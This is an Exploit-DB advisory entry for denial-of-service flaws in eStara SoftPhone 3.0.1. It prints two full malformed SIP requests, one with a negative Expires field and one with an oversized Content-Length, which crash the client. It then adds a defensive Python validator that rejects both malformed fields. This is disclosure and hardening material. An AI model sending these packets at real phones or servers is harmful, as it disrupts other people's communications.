exploitdb | ZwelL | EDB-ID:27211
History: Feb 14, 2006 - 12:00 a.m.

eStara SoftPhone 3.0.1 SIP Packet - Multiple Malformed Field Denial of Service Vulnerabilities

2006-02-14 00:00:00
ZwelL
www.exploit-db.com

AI Score: 7.4 (Confidence: Low)

source: https://www.securityfocus.com/bid/16629/info
 
eStara SoftPhone is prone to multiple denial-of-service vulnerabilities when processing malformed VoIP headers. Successful exploitation will cause the device to crash.

For the negative 'Expires' field issue:

OPTIONS sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3334;branch=z9hG4bK00001793z9hG4bK.00001FDB
From: 1793 <sip:[email protected]>;tag=1793
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 5185 OPTIONS
Expires: -127

For the 'Content-Length' field issue:

INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 172.16.3.6:3333;branch=z9hG4bK00002386z9hG4bK.0000234E
From: 2386 <sip:[email protected]>;tag=2386
To: zwell <sip:[email protected]>
Call-ID: [email protected]
CSeq: 4896 INVITE
Content-Type: application/sdp
Content-Length: 1111111111

v=0
o=2386 2386 2386 IN IP4 172.16.3.6
s=Session SDP
c=IN IP4 172.16.3.6
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000
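
A receiving SIP stack or a filtering proxy can reject both malformed fields before they reach deeper parsing. The Python below is an added example, not code from the advisory or from eStara; the function names are hypothetical, and the datagrams and addresses in it are constructed.

```python
# Added example, not part of the advisory. Datagrams below are constructed;
# addresses are placeholders (example.invalid, 192.0.2.10).
MAX_UINT32 = 2**32 - 1  # RFC 3261 upper bound for Expires

def _bounded_uint(text, upper=MAX_UINT32):
    """Parse plain decimal digits; None if malformed, signed, or above upper."""
    if not (text.isascii() and text.isdigit()) or len(text) > 10:
        return None
    value = int(text)
    return value if value <= upper else None

def _split(raw):
    """Split a SIP datagram into (lower-cased header dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    fields = {}
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep:
            key = name.strip().lower().decode("ascii", "replace")
            fields[key] = value.strip().decode("ascii", "replace")
    return fields, body

def check_sip_datagram(raw):
    """Return findings for Expires and Content-Length; empty list means sane."""
    fields, body = _split(raw)
    findings = []
    exp = fields.get("expires")
    if exp is not None and _bounded_uint(exp) is None:
        findings.append("Expires is not an integer in 0..2^32-1: %r" % exp)
    clen = fields.get("content-length", fields.get("l"))  # "l" = compact form
    if clen is not None:
        declared = _bounded_uint(clen)
        if declared is None:
            findings.append("Content-Length is not a valid length: %r" % clen)
        elif declared > len(body):
            # Over UDP the body cannot extend past the datagram (RFC 3261, 18.3)
            findings.append("Content-Length %d exceeds %d body bytes received"
                            % (declared, len(body)))
    return findings

_SDP = b"v=0\r\ns=-\r\nc=IN IP4 192.0.2.10\r\nt=0 0\r\n"

def _msg(method, extra, body=b""):
    return (b"%s sip:user@example.invalid SIP/2.0\r\nCSeq: 1 %s\r\n%s\r\n\r\n"
            % (method, method, extra)) + body

NEG_EXPIRES = _msg(b"OPTIONS", b"Expires: -127")
BIG_LENGTH = _msg(b"INVITE", b"Content-Length: 1111111111", _SDP)
WELL_FORMED = _msg(b"INVITE", b"Expires: 3600\r\nContent-Length: %d" % len(_SDP), _SDP)
```

A request that produces any finding is answered with 400 Bad Request or dropped; the declared length is never used to size a buffer or drive a read.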
